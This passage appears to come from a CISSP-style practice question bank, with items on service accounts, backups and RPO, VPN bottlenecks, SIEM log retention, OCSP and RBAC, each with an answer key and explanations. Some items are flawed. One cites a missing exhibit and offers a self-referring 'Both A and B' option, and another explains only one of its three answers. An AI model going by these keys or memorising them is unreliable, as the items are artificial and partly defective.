The trap here is that candidates often choose a Group Policy or password-strength solution because they focus on mitigating the symptom (interactive logon) rather than selecting the architectural fix (MSAs) that eliminates the root cause and aligns with the principle of least privilege and secure design.

How to eliminate wrong answers

Option A is wrong because implementing Group Policy to deny interactive logon for service accounts is a workaround that does not address the root cause; it can be bypassed or misconfigured, and it still leaves the account with other unnecessary privileges and manual password management. Option B is wrong because ensuring strong passwords only mitigates the risk of credential theft but does not prevent interactive logon, which is the primary vulnerability; service accounts should not have interactive logon rights regardless of password strength. Option D is wrong because removing service accounts from the local Administrators group reduces privileges but does not prevent interactive logon; a service account could still log on interactively with lower privileges, which is still a security concern.

291
Multi-Select · medium

Which TWO of the following are key objectives of a security assessment? (Select exactly 2.)

Select 2 answers
A. Identify vulnerabilities in systems and applications.
B. Assess the effectiveness of existing security controls.
C. Exploit vulnerabilities to gain unauthorized access.
D. Prioritize threats based on business impact.
E. Implement new security controls to address findings.
Answers: A, B

Vulnerability identification is a primary goal of security assessments.

Why this answer

A is correct because identifying vulnerabilities is a primary objective of a security assessment, such as a vulnerability scan or penetration test, which systematically discovers weaknesses in systems and applications (e.g., missing patches, misconfigurations, or insecure code). B is correct because assessing the effectiveness of existing security controls (e.g., firewalls, IDS/IPS, access controls) is a core goal, often achieved through control testing or validation to determine if controls are properly implemented and functioning as intended.

Exam trap

The trap here is that candidates often confuse the objectives of a security assessment (identify vulnerabilities and assess controls) with the objectives of a penetration test (exploit vulnerabilities) or risk management (prioritize threats), leading them to select options C or D incorrectly.

292
MCQ · medium

An organization is implementing a new backup strategy for its critical servers. The backup must support rapid restoration of individual files and allow for a recovery point objective (RPO) of no more than 15 minutes. Which backup method should be used for daily operations?

A. Full backup every 24 hours
B. Continuous data protection (CDP)
C. Differential backup every 6 hours
D. Incremental backup every 4 hours
Answer: B

CDP captures every write, enabling restoration to any point within seconds, meeting the RPO.

Why this answer

Continuous data protection (CDP) is the only backup method that can guarantee a recovery point objective (RPO) of 15 minutes or less because it captures every write to disk in real time or near-real time, enabling restoration to any point within the protection window. Full, differential, and incremental backups all rely on periodic snapshots, which inherently introduce gaps that exceed a 15-minute RPO unless the interval is shorter than 15 minutes, which is impractical for daily operations.

Exam trap

The trap here is that candidates may confuse the backup method's recovery time objective (RTO) with the recovery point objective (RPO), or assume that frequent incremental backups (e.g., every 4 hours) can achieve a 15-minute RPO, but the RPO is determined by the backup interval, not the method's efficiency.

How to eliminate wrong answers

Option A is wrong because a full backup every 24 hours provides an RPO of up to 24 hours, far exceeding the 15-minute requirement. Option C is wrong because a differential backup every 6 hours still leaves up to 6 hours of potential data loss between backups. Option D is wrong because an incremental backup every 4 hours results in an RPO of up to 4 hours, which does not meet the 15-minute threshold.

293
MCQ · medium

A network engineer is troubleshooting a slow VPN connection between two sites. The link is symmetric 100 Mbps, but throughput tests show only 20 Mbps. The VPN uses AES-256 encryption. What is the most likely cause?

A. Packet loss due to link congestion
B. CPU bottleneck on the VPN endpoints
C. MTU mismatch causing fragmentation
D. Incorrect TCP window scaling
Answer: B

AES-256 encryption consumes CPU resources; if the devices are underpowered, throughput will be severely limited.

Why this answer

AES-256 encryption is computationally intensive, and the throughput of a VPN is often limited by the cryptographic processing capacity of the endpoint CPUs rather than the link bandwidth. A symmetric 100 Mbps link with only 20 Mbps throughput strongly indicates that the VPN endpoints cannot encrypt/decrypt fast enough, creating a CPU bottleneck.

Exam trap

The trap here is that candidates often assume a slow VPN is always due to network issues like congestion or MTU, but the CISSP exam tests the understanding that encryption overhead, especially with AES-256, can be a CPU-bound bottleneck on the endpoints.

How to eliminate wrong answers

Option A is wrong because packet loss due to link congestion would typically cause TCP throughput to drop, but the link is symmetric 100 Mbps and not reported as saturated; the symptom is a consistent throughput cap, not variable loss. Option C is wrong because MTU mismatch causing fragmentation would result in increased overhead and possibly packet drops, but it would not consistently cap throughput at exactly 20 Mbps; it would cause performance degradation with larger packets, not a fixed rate. Option D is wrong because incorrect TCP window scaling can limit throughput on high-latency links, but the question does not mention high latency, and a fixed 20 Mbps cap on a 100 Mbps link is more characteristic of a CPU processing limit than a window scaling issue.

294
MCQ · medium

A healthcare organization is implementing a new SIEM solution to centralize log management from its network devices, servers, and applications. The compliance team requires that all logs be retained for at least one year to meet HIPAA regulations. The SIEM platform has limited storage capacity and uses a hot/warm/cold tier architecture. The system currently ingests about 500 GB of logs per day. The security team wants to ensure that critical logs (e.g., authentication failures, privilege escalations) remain immediately searchable for at least 90 days, while less critical logs can be moved to cheaper storage after 30 days. What is the most cost-effective storage strategy that meets all requirements?

A. Store all logs in hot storage for 90 days, then archive to cold storage indefinitely.
B. Store only critical logs in hot storage for 1 year, delete non-critical logs after 30 days.
C. Store all logs in hot storage for 30 days, then delete them after 90 days.
D. Store critical logs in hot storage for 90 days, then move all logs to warm/cold storage for the remainder of the year.
Answer: D

Meets both immediate searchability and long-term retention cost-effectively.

Why this answer

Option D is correct because it aligns the SIEM's hot/warm/cold tier architecture with the organization's retention and searchability requirements. Critical logs remain in hot storage for 90 days for immediate searching, then all logs are moved to cheaper warm/cold storage for the remaining 275 days to meet the one-year HIPAA retention mandate. This balances cost efficiency with compliance, avoiding unnecessary hot storage costs for non-critical logs beyond 30 days.

Exam trap

The trap here is that candidates assume all logs must be treated identically or that compliance allows deletion of non-critical logs, but HIPAA requires retention of all logs for one year, and tiered storage allows cost-effective compliance by separating searchability from retention duration.

How to eliminate wrong answers

Option A is wrong because storing all logs in hot storage for 90 days wastes resources on non-critical logs that only need 30 days of hot retention, and archiving indefinitely after 90 days may exceed the one-year retention requirement without cost optimization. Option B is wrong because deleting non-critical logs after 30 days violates HIPAA's one-year retention requirement for all logs, not just critical ones. Option C is wrong because deleting all logs after 90 days fails the one-year retention mandate entirely, and storing all logs in hot storage for 30 days is inefficient for critical logs that need 90 days of immediate searchability.

295
MCQ · easy

A development team is integrating a third-party library for encryption. The security team insists on using only the latest version of the library. What is the primary security benefit of this requirement?

A. Improves performance due to optimized code.
B. Ensures the library has more features than older versions.
C. Reduces the attack surface by patching known vulnerabilities.
D. Guarantees backward compatibility with existing code.
Answer: C

The latest version includes fixes for vulnerabilities discovered in prior versions.

Why this answer

Option C is correct because using the latest version ensures that vulnerabilities known in older versions have been patched. Option A is wrong because performance improvements are secondary to security. Option B is wrong because newer versions may introduce new features but can also break compatibility, and more features is not a security benefit. Option D is wrong because backward compatibility is not the primary security benefit.

296
MCQ · medium

A company uses a cloud storage service. Which asset security control is most important to prevent unauthorized access to data?

A. Logging and monitoring
B. Encryption in transit and at rest
C. Periodic access reviews
D. Regular vulnerability scanning
Answer: B

Encryption renders data unreadable without keys, preventing unauthorized access.

Why this answer

Encryption in transit (e.g., TLS 1.3) and at rest (e.g., AES-256) is the most important asset security control because it renders data unreadable even if the cloud storage service is compromised or an attacker gains access to the underlying infrastructure. Without encryption, all other controls (logging, reviews, scanning) are reactive and cannot prevent a direct breach of the stored data. This aligns with the CISSP principle of defense in depth, where encryption provides a strong preventive layer for data confidentiality.

Exam trap

ISC2 often tests the misconception that logging or access reviews are sufficient to prevent unauthorized access, but the trap here is that only encryption provides a strong preventive control that protects data confidentiality regardless of other failures.

How to eliminate wrong answers

Option A is wrong because logging and monitoring are detective controls that identify unauthorized access after it occurs, not preventive controls that stop it in the first place. Option C is wrong because periodic access reviews are administrative controls that verify existing permissions but do not prevent an attacker from exploiting a misconfiguration or stolen credential between reviews. Option D is wrong because regular vulnerability scanning identifies weaknesses in the system but does not directly protect the data itself; encryption is a compensating control that mitigates the risk of exploitation even if vulnerabilities exist.

297
MCQ · medium

A large organization needs to deploy a Public Key Infrastructure (PKI) for thousands of devices and users. A key requirement is the ability to revoke certificates in real time when a device is lost or compromised. Which solution is most appropriate?

A. Deploy multiple hierarchical CAs and distribute CRLs periodically.
B. Rely on certificate expiration only and do not implement revocation.
C. Use a single Certificate Authority (CA) with a large Certificate Revocation List (CRL).
D. Implement Online Certificate Status Protocol (OCSP) responders.
Answer: D

OCSP allows real-time verification of certificate status.

Why this answer

OCSP provides real-time certificate status checking by querying an OCSP responder directly, eliminating the delays inherent in CRL distribution. This meets the requirement for immediate revocation verification when a device is lost or compromised, as the responder can return a 'revoked' status instantly without waiting for a CRL refresh cycle.

Exam trap

The trap here is that candidates confuse periodic CRL distribution (which is batch-oriented and slow) with real-time revocation, or assume a single CA with a large CRL is sufficient, overlooking the scalability and latency issues that make OCSP the correct choice for immediate status checks.

How to eliminate wrong answers

Option A is wrong because distributing CRLs periodically introduces latency (hours or days) between revocation and propagation, failing the real-time requirement. Option B is wrong because relying solely on certificate expiration ignores the need for immediate revocation, leaving compromised certificates valid until their natural expiry. Option C is wrong because a single CA with a large CRL creates a single point of failure and scalability issues, and CRLs are still distributed periodically, not in real time.

298
Multi-Select · hard

An organization is implementing a security information and event management (SIEM) system. Which THREE factors are most critical for the SIEM to provide actionable security insights?

Select 3 answers
A. Real-time alerting capabilities
B. Ability to store raw logs for one year
C. Correlation rules that match attack patterns
D. Low false-positive rate
E. Accurate and normalized log sources
Answers: A, C, E

Timely alerts are crucial for response.

Why this answer

Real-time alerting is critical because SIEM must detect and notify security teams of ongoing threats within seconds to minutes, enabling timely incident response. Without near-instantaneous correlation and alerting, attackers can achieve their objectives (e.g., lateral movement, data exfiltration) before the organization even knows an incident occurred. This aligns with the NIST SP 800-61 incident response lifecycle, where detection and analysis must be rapid to contain damage.

Exam trap

The trap here is that candidates confuse 'low false-positive rate' (a tuning outcome) with a critical implementation factor, when in fact the foundational requirements are accurate normalized logs, correlation rules, and real-time alerting — without these, no alerts (true or false) can be generated at all.

299
MCQ · easy

Refer to the exhibit. A project team is sending a spreadsheet marked Confidential via email. What control is required?

A. Both A and B
B. Encrypt the email and attachment
C. No additional controls if sent over internal network
D. Use a secure file transfer protocol
Answer: B

Email encryption protects the data in transit as policy requires.

Why this answer

Option B is correct because email transmissions, including attachments, are transmitted in plaintext by default using SMTP (RFC 5321). Encrypting both the email body and the attachment ensures confidentiality, protecting the spreadsheet marked Confidential from unauthorized access during transit. This aligns with the principle of protecting data at rest and in transit as required by asset security policies.

Exam trap

The trap here is that candidates assume internal networks are safe or that secure file transfer protocols are equivalent to email encryption, but CISSP tests the specific requirement to protect data in transit over any network, including internal ones, using appropriate cryptographic controls like email encryption.

How to eliminate wrong answers

Option A is wrong because it is not a distinct control but a combination of options, and since only Option B is correct, 'Both A and B' is invalid. Option C is wrong because internal networks are not inherently secure; traffic can be intercepted via ARP spoofing or network sniffing, and no additional controls would violate confidentiality requirements for sensitive data. Option D is wrong because secure file transfer protocols (e.g., SFTP, FTPS) are designed for file transfers, not for sending email; using such a protocol would not address the email transmission channel itself, leaving the email body and metadata exposed.

300
Multi-Select · hard

A developer is implementing role-based access control (RBAC). Which THREE components are essential for an RBAC system?

Select 3 answers
A. Permissions
B. Attributes
C. Users
D. Roles
E. Sessions
Answers: A, C, D

Permissions define access rights.

Why this answer

RBAC is defined by users, roles, and permissions. Sessions are optional enhancements. Attributes are part of ABAC, not RBAC.
